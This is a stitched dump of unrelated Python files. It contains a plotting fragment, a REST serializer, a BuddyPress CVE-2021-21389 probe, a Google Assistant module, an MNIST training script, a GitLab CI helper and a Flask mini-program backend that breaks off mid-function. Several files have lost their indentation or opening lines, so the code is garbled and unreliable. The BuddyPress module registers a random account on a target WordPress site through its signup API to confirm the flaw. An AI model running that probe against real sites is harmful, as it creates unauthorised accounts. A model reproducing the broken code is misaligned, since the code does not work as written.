"""Returns a single plot figure size in inches given a width in points"""
inches_per_point = 1.0/72.27
golden_mean = (math.sqrt(5)-1.0)/2.0
inches_width = width * inches_per_point
fig_height = inches_width*golden_mean
return [inches_width,fig_height]
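# Minimal demonstration of the main/diff layout (made-up data, shown only
# when the module is run directly):
if __name__ == '__main__':
    fig, (main_axis, diff_axis) = setup_axes(diff=True)
    x = [0, 1, 2, 3]
    main_axis.plot(x, [1.0, 0.5, 0.25, 0.125], label='model')
    diff_axis.plot(x, [0.0, 0.02, -0.01, 0.01])
    layout_main_and_diff_axis(fig, (main_axis, diff_axis))
    configure_legend_on_axis(main_axis, title='fit')
    plt.show()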
|
nilq/baby-python
|
python
|
from rest_framework import serializers
from polyclinics.models import Poly
class PolySerializer(serializers.ModelSerializer):
class Meta:
model = Poly
fields = '__all__'
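# A matching viewset sketch (an assumption for illustration, not part of
# this file):
# from rest_framework import viewsets
#
# class PolyViewSet(viewsets.ModelViewSet):
#     queryset = Poly.objects.all()
#     serializer_class = PolySerializer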
|
nilq/baby-python
|
python
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''BuddyPress REST API Privilege Escalation to RCE''',
"description": '''The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE''',
"severity": "high",
"references": [
"https://github.com/HoangKien1020/CVE-2021-21389",
"https://buddypress.org/2021/03/buddypress-7-2-1-security-release/",
"https://codex.buddypress.org/releases/version-7-2-1/",
"https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-21389",
"cwe-id": "CWE-863"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "wordpress", "wp-plugin", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
    # default to failure so callers always find the "success" key
    result = {"success": False}
try:
url = format_url(url)
path = """/wp-json/buddypress/v1/signup"""
method = "POST"
data = """{
"user_login":"{{randstr}}",
"password":"{{randstr}}",
"user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com"
}"""
headers = {'Content-Type': 'application/json; charset=UTF-8'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""user_login""" in resp0.text and """registered""" in resp0.text and """activation_key""" in resp0.text and """user_email""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
    except Exception:
        result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
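# Example (target is hypothetical; only probe systems you are authorised to test):
# print(poc("http://target.example"))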
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# Copyright (C) 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os.path
from resources.lib.utils import import_or_install, json, PlayerMetaData, PLATFORM, PLAYING_STATES, PLAYING_STATE, LISTENING_STATE, IDLE_STATE, NOTIFY_STATE, ALERT_STATE, SPEAKING_STATE
import threading
import sys
import logging
# LOGGER is used throughout this module but was never defined in this snippet;
# a module-level logger is the most likely intent.
LOGGER = logging.getLogger(__name__)
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
def setup(monitor):
'''setup the module'''
if not "armv7" in PLATFORM:
LOGGER.warning("unsupported platform! %s" % PLATFORM)
return False
enabled = monitor.config.get("ENABLE_MODULE_GOOGLE_ASSISTANT", False)
if not enabled:
LOGGER.debug("Google Assistant module is not enabled!")
return False
dummy_mic = "Dummy" in monitor.config["ALSA_CAPTURE_DEVICE"]
mute_mic = monitor.config.get("GOOGLE_ASSISTANT_MUTE_MIC", dummy_mic)
import_or_install("pathlib2", "pathlib", installpip="pathlib2")
import_or_install("google.assistant.library", "Assistant", True, installpip="google-assistant-library google-assistant-sdk[samples]", installapt="portaudio19-dev libffi-dev libssl-dev")
import_or_install("google.assistant.library.event", "EventType", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.file_helpers", "existing_file", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.device_helpers", "register_device", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.oauth2.credentials", "Credentials", True, installpip="google-auth-oauthlib[tool]")
model_id="voice-kit-208321-voice-kit-kftedd"
project_id="voice-kit-208321"
client_secrets = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..","resources", "googlecreds.json")
credentialsfile = None
devconfig_file = None
return GoogleAssistantPlayer(credentialsfile, model_id, project_id, devconfig_file, client_secrets, monitor, mute_mic)
class GoogleAssistantPlayer(threading.Thread):
_exit = threading.Event()
_assistant = None
def command(self, cmd, cmd_data=None):
if not self._assistant:
return False
if self.monitor.states["google_assistant"]["state"] == PLAYING_STATE:
if cmd == "pause":
self._assistant.send_text_query("pause")
return True
elif cmd == "stop":
self._assistant.send_text_query("stop")
return True
else:
return False
elif cmd == "broadcast":
self._assistant.send_text_query("broadcast %s" % cmd_data)
return True
else:
return False
def process_event(self, event):
"""Pretty prints events.
Prints all events that occur with two spaces between each new
conversation and a single space between turns of a conversation.
Args:
event(event.Event): The current event to process.
"""
LOGGER.debug("Google received event: %s" % event)
if event.type == EventType.ON_START_FINISHED:
LOGGER.info("Google Assistant is now ready for commands (waiting for hotword)")
self._assistant.send_text_query("set volume to 100 percent")
elif event.type in [EventType.ON_CONVERSATION_TURN_STARTED]:
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
self.monitor.command("system", "ping")
LOGGER.info("Google Assistant is now listening for a command (hotword detected)")
elif event.type in [EventType.ON_ALERT_STARTED]:
self.monitor.states["google_assistant"]["state"] = ALERT_STATE
LOGGER.info("Google Assistant is now broadcasting an alert")
elif event.type == EventType.ON_RENDER_RESPONSE:
self.monitor.states["google_assistant"]["title"] = event.args.get("text","")
elif event.type in [EventType.ON_RESPONDING_STARTED]:
self.monitor.states["google_assistant"]["state"] = SPEAKING_STATE
LOGGER.info("Google Assistant is talking a response")
elif event.type in [EventType.ON_MEDIA_TRACK_PLAY]:
self.monitor.states["google_assistant"]["state"] = PLAYING_STATE
LOGGER.info("Google Assistant is playing media")
elif event.type in [EventType.ON_ALERT_FINISHED,
EventType.ON_CONVERSATION_TURN_TIMEOUT,
EventType.ON_RESPONDING_FINISHED,
EventType.ON_MEDIA_TRACK_STOP,
EventType.ON_CONVERSATION_TURN_FINISHED]:
# check for follow-up
if event.type == EventType.ON_CONVERSATION_TURN_FINISHED:
if event.args and event.args['with_follow_on_turn']:
# the mic is listening again for follow-up
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
return
# return to idle
self.monitor.states["google_assistant"]["state"] = IDLE_STATE
elif event.type == EventType.ON_DEVICE_ACTION:
for command, params in event.actions:
LOGGER.info("Do command %s - with params: %s" % (command, params))
def authenticate_device(self):
import google_auth_oauthlib.flow
scopes = ["https://www.googleapis.com/auth/assistant-sdk-prototype", "https://www.googleapis.com/auth/gcm"]
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
flow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(
self.client_secrets,
scopes=scopes
)
flow.redirect_uri = flow._OOB_REDIRECT_URI
auth_url, _ = flow.authorization_url()
LOGGER.info("######################################################################################")
LOGGER.info("# Registering Google Assistant #")
LOGGER.info('# Please visit the url below in your browser and #')
LOGGER.info('# paste the resulting code in the web configuration #')
LOGGER.info('# There will be a new setting added, called "GOOGLE ASSISTANT AUTH CODE" #')
LOGGER.info('# #')
LOGGER.info(' ')
LOGGER.info(' %s' % auth_url)
LOGGER.info(' ')
LOGGER.info("######################################################################################")
self.monitor.states["messages"].append("Google Assistant needs to be registered. See the log for details.")
code = None
while not code and not self._exit.is_set():
code = self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"]
if code:
flow.fetch_token(code=code)
LOGGER.info("Device is registered succesfully!")
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
creds = flow.credentials
creds_data = {
'token': creds.token,
'refresh_token': creds.refresh_token,
'token_uri': creds.token_uri,
'client_id': creds.client_id,
'client_secret': creds.client_secret,
'scopes': creds.scopes
}
del creds_data['token']
config_path = os.path.dirname(self.credentialsfile)
if not os.path.isdir(config_path):
os.makedirs(config_path)
with open(self.credentialsfile, 'w') as outfile:
json.dump(creds_data, outfile)
LOGGER.debug("Credentials saved to %s" % self.credentialsfile)
def __init__(self, credentialsfile=None, model_id=None, project_id=None, devconfig_file=None, client_secrets=None, monitor=None, mic_muted=False):
if not credentialsfile:
credentialsfile = os.path.join(os.path.expanduser('~/.config'), 'google-oauthlib-tool','credentials.json')
self.credentialsfile = credentialsfile
if not devconfig_file:
devconfig_file = os.path.join(os.path.expanduser('~/.config'), 'googlesamples-assistant','device_config_library.json')
device_model_id = None
last_device_id = None
try:
with open(devconfig_file) as f:
device_config = json.load(f)
device_model_id = device_config['model_id']
last_device_id = device_config.get('last_device_id', None)
except FileNotFoundError:
LOGGER.warning("device config file not found")
if not model_id and not device_model_id:
raise Exception('Missing --device-model-id option')
# Re-register if "device_model_id" is given by the user and it differs
# from what we previously registered with.
should_register = (
model_id and model_id != device_model_id)
self.device_model_id = model_id or device_model_id
self.devconfig_file = devconfig_file
self.last_device_id = last_device_id
self.project_id = project_id
self.should_register = should_register
self.mic_muted = mic_muted
self.monitor = monitor
self.client_secrets = client_secrets
if monitor:
self.monitor.states["google_assistant"] = PlayerMetaData("Google Assistant")
threading.Thread.__init__(self)
def stop(self):
self._exit.set()
if self._assistant:
self._assistant.send_text_query("exit")
threading.Thread.join(self, 2)
def run(self):
if not os.path.isfile(self.credentialsfile):
# we should authenticate
self.authenticate_device()
if not os.path.isfile(self.credentialsfile):
return
with open(self.credentialsfile, 'r') as f:
self.credentials = Credentials(token=None, **json.load(f))
with Assistant(self.credentials, self.device_model_id) as assistant:
events = assistant.start()
assistant.set_mic_mute(self.mic_muted)
device_id = assistant.device_id
LOGGER.info('device_model_id: %s' % self.device_model_id)
LOGGER.info('device_id: %s' % device_id)
self._assistant = assistant
# Re-register if "device_id" is different from the last "device_id":
if self.should_register or (device_id != self.last_device_id):
if self.project_id:
register_device(self.project_id, self.credentials,
self.device_model_id, device_id)
pathlib.Path(os.path.dirname(self.devconfig_file)).mkdir(exist_ok=True)
with open(self.devconfig_file, 'w') as f:
json.dump({
'last_device_id': device_id,
'model_id': self.device_model_id,
}, f)
else:
LOGGER.error("Device is not registered!")
for event in events:
if self._exit.is_set():
return
self.process_event(event)
|
nilq/baby-python
|
python
|
import time
# only required to run python3 examples/cvt_arm.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import Dataset
import os
import math
import numpy as np
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_size = 64 # batch size in every epoch
class CustomDataset(Dataset):
def __init__(self, data, targets, transform=None, target_transform=None):
self.data = data
self.targets = targets
self.transform = transform
self.target_transform = target_transform
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
img, target = self.data[idx], self.targets[idx]
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
train_dataset = datasets.MNIST(root = 'data/', train=True, download=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
# training set
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4,
drop_last=True)
test_dataset = datasets.MNIST(root = 'data/', train=False, download=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
# test set
test_loader = torch.utils.data.DataLoader(test_dataset,
batch_size=100,
shuffle=True,
num_workers=4,
drop_last=False)
inv_adv_examples = np.load("invariance_examples/final_l0/inv_adv_examples.npy") # visualize this for sanity check
human_labels = np.load("invariance_examples/final_l0/human_labels.npy")
inv_eg_dataset = CustomDataset(data=inv_adv_examples,
targets=human_labels,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
inv_eg_dataloader = torch.utils.data.DataLoader(inv_eg_dataset,
batch_size=10,
shuffle=True,
num_workers=4,
drop_last=False)
class MLP(nn.Module):
def __init__(self, input_size=784, output_size=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_size, 20)
self.fc2 = nn.Linear(20, output_size)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
return F.log_softmax(x, dim=1)
model = MLP()
model = model.to(device)
epochs = 100
# specify loss function; the model outputs log-probabilities (log_softmax),
# so NLLLoss is the matching criterion (CrossEntropyLoss would apply
# log-softmax a second time)
criterion = nn.NLLLoss()
# specify optimizer
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
model.train() # prep model for training
standard_acc_arr = []
robust_acc_arr = []
for epoch in range(epochs):
    model.train()  # re-enable train mode; the model.eval() calls below would otherwise persist
    # monitor training loss
    train_loss = 0.0
###################
# train the model #
###################
for data, target in train_loader:
data, target = data.to(device), target.to(device)
# clear the gradients of all optimized variables
optimizer.zero_grad()
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# calculate the loss
loss = criterion(output, target)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item()*data.size(0)
#--------------------------------------------------------------------------------------
# initialize lists to monitor test loss and accuracy
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for *evaluation*
for data, target in test_loader:
data, target = data.to(device), target.to(device)
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
standard_acc_arr.append(test_accuracy)
print('\n Standard test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
np.sum(class_correct),
np.sum(class_total)))
#--------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------
# initialize lists to monitor test loss and accuracy
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for *evaluation*
for data, target in inv_eg_dataloader:
data, target = data.to(device), target.to(device)
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
robust_acc_arr.append(test_accuracy)
print('\n Robust test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
np.sum(class_correct),
np.sum(class_total)))
#--------------------------------------------------------------------------------------
save_path = "saved_stuff/eval_mlp/"
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(standard_acc_arr, os.path.join(save_path, "standard_acc_arr.pt"))
torch.save(robust_acc_arr, os.path.join(save_path, "robust_acc_arr.pt"))
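# A minimal sketch for inspecting the saved curves afterwards (assumes
# matplotlib is installed; file names match the torch.save() calls above):
# import matplotlib.pyplot as plt
# std = torch.load("saved_stuff/eval_mlp/standard_acc_arr.pt")
# rob = torch.load("saved_stuff/eval_mlp/robust_acc_arr.pt")
# plt.plot(std, label="standard"); plt.plot(rob, label="robust")
# plt.xlabel("epoch"); plt.ylabel("accuracy (%)"); plt.legend(); plt.show()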
|
nilq/baby-python
|
python
|
import os
import requests
from datetime import datetime, timedelta
import gitlab
class Gitlab():
def __init__(self, api_url, **kwargs):
self.gitlab = gitlab.Gitlab(api_url, **kwargs)
def is_gitlab(self):
if os.environ.get('CI', 'false') == 'true':
return True
else:
return False
def is_pull_request(self):
if self.is_gitlab() and os.environ.get('CI_MERGE_REQUEST_ID', None) is not None:
return True
else:
return False
def branch(self):
if self.is_gitlab():
return os.environ.get('CI_COMMIT_BRANCH')
else:
return 'master'
def commit_hash(self):
return os.environ.get('CI_COMMIT_SHA', '0' * 30)
def short_commit_hash(self):
return os.environ.get('CI_COMMIT_SHA', '0' * 30)[:7]
def tag(self):
return os.environ.get('CI_COMMIT_TAG', None)
def is_tag(self):
if os.environ.get('CI_COMMIT_TAG', False):
return True
else:
return False
def home_dir(self):
return os.environ.get('HOME', '/dev/null')
def build_dir(self):
return os.environ.get('CI_BUILDS_DIR', '/dev/null')
    def build_number(self):
        prj = self.gitlab.projects.get(os.environ['CI_PROJECT_ID'])
        try:
            var = prj.variables.get('BUILD_NUMBER')
        except gitlab.exceptions.GitlabGetError as e:
            if e.response_code == 404:
                # first build: create the counter and use it, rather than
                # leaving var as None and crashing below
                var = prj.variables.create({'key': 'BUILD_NUMBER', 'value': '0'})
            else:
                raise
        var.value = str(int(var.value) + 1)
        var.save()
        return int(var.value)
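# A minimal usage sketch (URL and token are illustrative; python-gitlab
# accepts private_token as a keyword argument, forwarded via **kwargs):
# ci = Gitlab("https://gitlab.example.com", private_token="glpat-...")
# if ci.is_gitlab():
#     print(ci.branch(), ci.short_commit_hash(), ci.build_number())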
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---------------------------------------
# Project: PKUYouth Webserver v2
# File: __init__.py
# Created Date: 2020-07-28
# Author: Xinghong Zhong
# ---------------------------------------
# Copyright (c) 2020 PKUYouth
import time
import datetime
import calendar
from functools import wraps
from collections import OrderedDict
from pypinyin import lazy_pinyin
from flask import Blueprint, current_app, g, abort
from ...models import db, WxUser, Article, WxUserArticle, Reporter, ArticleReporter
from ...core.flask.parser import get_str_field, get_int_field, get_bool_field
from ...core.redis.types import RedisAutoExpiredMap
from ...core.utils import u, xMD5
from ...core.exceptions import MiniappUnauthorized, RequestArgumentError
from .api import jscode2session
bpMiniapp = Blueprint('miniapp', __name__)
utoken_map = None
UTOKEN_EXPIRES = 3600 * 12
PAGE_SIZE = 8
QINIU_IMAGE_PREFIX = "https://qiniu.rabbitzxh.top/pkuyouth"
APP_CONFIG = {
"prefix": {
"column": QINIU_IMAGE_PREFIX + "/column_cover/",
"sm_cover": QINIU_IMAGE_PREFIX + "/sm_cover/",
"bg_cover": QINIU_IMAGE_PREFIX + "/bg_cover/"
},
"app_info": {
"name": "北大青年",
"version": "2.0.0",
}
}
INDEX_COL_DESC = [
{
"id": 0,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508266021.jpeg',
"title": '随便看看',
"desc": '随意翻翻北青的文章',
"path": '/pages/collection-random/collection-random',
},
{
"id": 1,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508283011.jpeg',
"title": '热文排行',
"desc": '看看那些阅读量最高的文章',
"path": '/pages/collection-hot/collection-hot',
},
{
"id": 2,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508251861.jpeg',
"title": '还有更多',
"desc": '主编们正在努力整理 ...',
"path": '',
}
]
COLUMNS_LIST = OrderedDict({
"调查": "只做好一件事——刨根问底",
"人物": "今天载了位了不得的人物",
"特稿": "不停留在表面",
"视界": "一览众山小",
"光阴": "不忘初心,继续前进",
"姿势": "干货、湿货、杂货,老司机带你涨姿势",
"言己": "说出你的故事",
"又见": "如果在异乡,一个旅人",
"雕龙": "操千曲而后晓声,观千剑而后识器",
"评论": "条条大路,众生喧哗",
"摄影": "我为了把你拍得更漂亮嘛~",
"图说": "边走边看",
"机动": "说走就走,想停就停;可以跑高速,亦可钻胡同",
"现场": "一车载你直达热点",
"对话": "听见你的声音",
"纪念": "为了未来,收藏过去",
"节日": "今天应该很高兴",
"新年献词": "新时代,新青年",
# "翻译": "null",
})
def init_utoken_map():
global utoken_map
if utoken_map is not None:
return
utoken_map = RedisAutoExpiredMap(
namespace=current_app.config['CACHE_KEY_PREFIX'] + "miniapp_utk",
expires=UTOKEN_EXPIRES,
)
def generate_utoken(openid, session_key):
return xMD5("%s:%s:%s" % (openid, session_key, int(time.time() * 1000)))
def get_range(page, size):
page = max(page, 1)
return ((page - 1) * size, page * size)
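# For example, get_range(2, 8) -> (8, 16): the slice bounds for page 2 when
# each page holds 8 articles (page numbers start at 1).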
def verify_utoken(func):
@wraps(func)
def wrapper(*args, **kwargs):
init_utoken_map()
utoken = get_str_field('utoken')
openid = utoken_map[utoken]
if openid is None:
raise MiniappUnauthorized("Invalid utoken")
g.openid = u(openid)
ret = func(*args, **kwargs)
return ret
return wrapper
@bpMiniapp.route('/', methods=["GET","POST"])
def root():
abort(404)
@bpMiniapp.route('/login', methods=["POST"])
def login():
"""
Method POST
JSON:
- js_code str
Return:
- errcode int
- utoken str
- setting dict
- auto_change_card bool
- use_small_card bool
- config dict
"""
init_utoken_map()
js_code = get_str_field('js_code')
openid, session_key = jscode2session(js_code)
utoken = generate_utoken(openid, session_key)
utoken_map[utoken] = openid
user = WxUser.query.get(openid)
if user is None:
user = WxUser(openid)
db.session.add(user)
db.session.commit()
return {
"errcode": 0,
"utoken": utoken,
"setting": {
"auto_change_card": user.auto_change_card,
"use_small_card": user.use_small_card,
},
"config": APP_CONFIG,
}
@bpMiniapp.route('/get_col_desc', methods=["GET"])
@verify_utoken
def get_col_desc():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- col_desc [dict]
- id int
- cover str
- title str
- desc str
- path str
"""
return {
"errcode": 0,
"col_desc": INDEX_COL_DESC,
}
@bpMiniapp.route('/get_col_random', methods=["GET"])
@verify_utoken
def get_col_random():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(db.func.rand()).\
limit(PAGE_SIZE).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_latest_articles', methods=["GET"])
@verify_utoken
def get_latest_articles():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
sbq = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(Article.masssend_time.desc()).\
limit(PAGE_SIZE).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.read_num,
Article.like_num,
Article.masssend_time,
Article.cover_url
).\
join(sbq, sbq.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_col_hot', methods=["GET"])
@verify_utoken
def get_col_hot():
"""
Method GET
Args:
- utoken str
- page int
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
page = get_int_field('page')
st, ed = get_range(page, PAGE_SIZE)
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(
Article.read_num.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
slice(st, ed).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.read_num.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_column_list', methods=["GET"])
@verify_utoken
def get_column_list():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- columns [dict]
- id int
- title str
- desc str
- cover str
- article_count int
"""
columns = list(COLUMNS_LIST.keys())
rlist = db.session.\
query(
Article.column,
db.func.count(Article.aid).label('count'),
).\
filter(Article.hidden == 0).\
filter(Article.column.in_(columns)).\
group_by(Article.column).\
all()
counter = { r.column: r.count for r in rlist }
return {
"errcode": 0,
"columns": [
{
"id": ix,
"title": title,
"desc": desc,
"cover": "%s.jpg" % ''.join(lazy_pinyin(title)),
"article_count": counter.get(title, 0),
}
for ix, (title, desc) in enumerate(COLUMNS_LIST.items())
],
}
@bpMiniapp.route('/get_column_articles', methods=["GET"])
@verify_utoken
def get_column_articles():
"""
Method GET
Args:
- utoken str
- column str
- page int if page == 0, return all articles in this column
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
column = get_str_field('column', limited=COLUMNS_LIST)
page = get_int_field('page')
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.column == column).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
)
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq1 = sbq1.slice(st, ed)
sbq1 = sbq1.subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_date_range', methods=["GET"])
@verify_utoken
def get_date_range():
"""
Method GET
Args:
- utoken str
"""
rlist = db.session.\
query(
db.func.min(Article.masssend_time),
db.func.max(Article.masssend_time)
).\
first()
st, ed = map(lambda t: time.strftime("%Y-%m-%d", time.localtime(t)), rlist)
return {
"errcode": 0,
"range": {
"start": st,
"end": ed,
}
}
@bpMiniapp.route('/search_reporters', methods=["GET"])
@verify_utoken
def search_reporters():
"""
Method GET
Args:
- utoken str
- keyword str
Return:
- errcode int
- reporters [dict]
- name str
- articles [int]
"""
keyword = get_str_field("keyword")
names = [ name.strip() for name in keyword.split() if len(name.strip()) > 0 ]
sbq = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
subquery()
reporters = db.session.\
query(
Reporter.name,
db.func.count(sbq.c.aid).label('article_count'),
).\
join(ArticleReporter, ArticleReporter.rid == Reporter.rid).\
join(sbq, sbq.c.aid == ArticleReporter.aid).\
filter(Reporter.name.in_(names)).\
group_by(Reporter.rid).\
order_by(db.desc('article_count')).\
all()
return {
"errcode": 0,
"reporters": [ r._asdict() for r in reporters ],
}
@bpMiniapp.route('/get_reporter_articles', methods=["GET"])
@verify_utoken
def get_reporter_articles():
"""
Method GET
Args:
- utoken str
- name str
        - page      int     if page == 0, return all articles by this reporter
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
name = get_str_field('name')
page = get_int_field('page')
sbq1 = db.session.\
query(Article.aid).\
join(ArticleReporter, ArticleReporter.aid == Article.aid).\
join(Reporter, Reporter.rid == ArticleReporter.rid).\
filter(Reporter.name == name).\
filter(Article.hidden == 0).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
)
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq1 = sbq1.slice(st, ed)
sbq1 = sbq1.subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ],
}
@bpMiniapp.route('/search_articles_by_date', methods=["GET"])
@verify_utoken
def search_articles_by_date():
"""
Method GET
Args:
- utoken str
- date str
- level str options: ('month','day')
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
date = get_str_field('date')
level = get_str_field('level', limited=['month','day'])
try:
dt = datetime.datetime.strptime(date, '%Y-%m-%d')
    except ValueError:
raise RequestArgumentError("Invalid date %s" % date)
if level == 'month':
st = datetime.datetime(dt.year, dt.month, 1)
span = calendar.monthrange(dt.year, dt.month)[1]
else:
st = dt
span = 1
ed = st + datetime.timedelta(span)
st, ed = map(lambda dt: int(dt.timestamp()), [st, ed])
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.masssend_time.between(st, ed)).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
subquery()
